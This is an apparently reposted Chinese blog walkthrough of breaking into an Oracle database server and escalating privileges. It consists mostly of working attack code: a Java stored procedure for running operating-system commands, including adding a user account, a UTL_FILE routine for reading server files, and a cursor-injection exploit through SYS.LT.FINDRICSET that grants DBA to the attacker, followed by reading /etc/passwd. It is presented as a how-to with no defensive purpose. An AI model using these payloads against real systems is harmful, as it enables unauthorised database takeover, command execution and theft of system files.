当前位置:  数据库>oracle

入侵Oracle服务器进一步获取权限

    来源: 互联网  发布时间:2017-03-24

    本文导语:   很快便连接上Oracle服务器,此时发现:   1.连接后不是dba权限   2.不能利用SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES漏洞提升权限   3.运行SELECT UTL_HTTP.request(‘http://xxxxxxxxxxx/login.jsp’) FROM dual 后发现oracle服务器不能连接...

  很快便连接上Oracle服务器,此时发现:

  1.连接后不是dba权限

  2.不能利用SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES漏洞提升权限

  3.运行SELECT UTL_HTTP.request(‘http://xxxxxxxxxxx/login.jsp’) FROM dual 后发现oracle服务器不能连接网络。

  幸运的是,

  运行

  create or replace function Linx_Query (p varchar2) return number authid current_user is begin execute immediate p; return 1;end;

  成功!这个用户具有create proceduce权限。

  此时马上想到创建java扩展执行命令:

  create or replace and compile java source named “LinxUtil” as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str=”";while ((stemp = myReader.readLine()) != null) str +=stemp+” “;myReader.close();return str;} catch (Exception e){return e.toString();}}}

  begin dbms_java.grant_permission(‘PUBLIC’, ‘SYS:java.io.FilePermission’, ‘’, ‘execute’ );end;

  create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ‘LinxUtil.runCMD(java.lang.String) return String’

  select * from all_objects where object_name like ‘%LINX%’

  grant all on LinxRunCMD to public

  select LinxRunCMD(‘cmd /c net user linx /add’) from dual

  但是在第一步就卡住了,服务器由于某种未知原因 不能创建java扩展!!

  还好,我们还有UTL库可以利用:

  create or replace function LinxUTLReadfile (filename varchar2) return varchar2 is

  fHandler UTL_FILE.FILE_TYPE;

  buf varchar2(4000);

  output varchar2(8000);

  BEGIN

  fHandler := UTL_FILE.FOPEN(‘UTL_FILE_DIR’, filename, ‘r’);

  loop

  begin

  utl_file.get_line(fHandler,buf);

  DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||buf);

  exception

  when no_data_found then exit;

  end;

  output := output||buf||chr(10);

  end loop;

  UTL_FILE.FCLOSE(fHandler);

  return output;

  END;

  UTL_FILE_DIR需要先用:

  CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS ‘/etc’;

  指定目。但运行后发现没有权限。只好想办法提权。

  ***************游标注射***************

  老外写了N个pdf介绍这技术,我精简了代码:

  DECLARE

  MYC NUMBER;

  BEGIN

  MYC := DBMS_SQL.OPEN_CURSOR;

  DBMS_SQL.PARSE(MYC,’declare pragma autonomous_transaction; begin execute immediate ”GRANT DBA TO linxlinx_current_db_user”;commit;end;’,0);

  DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);

  BEGIN SYS.LT.FINDRICSET(‘.”||dbms_sql.execute( ‘||MYC||’ )||””)–’,'x’); END;

  raise NO_DATA_FOUND;

  EXCEPTION

  WHEN NO_DATA_FOUND THEN DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);

  WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);

  END;

  运行后重新连接就有dba权限了,简单吧……

  现在可以读取文件了:

  CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS ‘/etc’;

  select LinxUTLReadfile(‘passwd’) from dual

  后面就简单了,不写了。


    
 
 

您可能感兴趣的文章:

 
本站(WWW.)旨在分享和传播互联网科技相关的资讯和技术,将尽最大努力为读者提供更好的信息聚合和浏览方式。
本站(WWW.)站内文章除注明原创外,均为转载、整理或搜集自网络。欢迎任何形式的转载,转载请注明出处。












  • 相关文章推荐
  • 如何追踪入侵者?
  • 入侵检测系统 Snort
  • linux会被入侵吗?
  • 系统入侵工具 rootkit
  • 网络入侵检测和阻止引擎 Suricata
  • 怎样入侵这样的Linux系统?
  • 入侵检测软件 Cyberprobe
  • 场所入侵监控系统 Trusion
  • 开源PHP入侵防御系统 MyPHPIPS
  • PHP入侵检测系统 PHPIDS
  • 请教做过基于snmp方式的入侵检测系统的哥们 !!!!!!!
  • 入侵检测方面的问题
  • 有做过基于snmp方式的入侵检测系统的哥们吗?请留下联系方式,以后多交流交流!
  • 入侵检测程序 OSSEC
  • 异形入侵游戏 UFO:Alien Invasion
  • linux服务器被(sb.zhuanrisb.com)入侵
  • 外星人入侵模拟游戏 Alien Invasion
  • linux 没有开放端口或者只开放一个端口会被入侵吗?
  • 如何修改linux内核来捕获入侵检测的数据,各位大虾多多赐教。
  • 请教高手:我想从路由器上取统计数据和信息来做入侵检测,我能路由器上取到那些相关的信息?


  • 站内导航:


    特别声明:169IT网站部分信息来自互联网,如果侵犯您的权利,请及时告知,本站将立即删除!

    ©2012-2021,,E-mail:www_#163.com(请将#改为@)

    HTML教程 iis7站长之家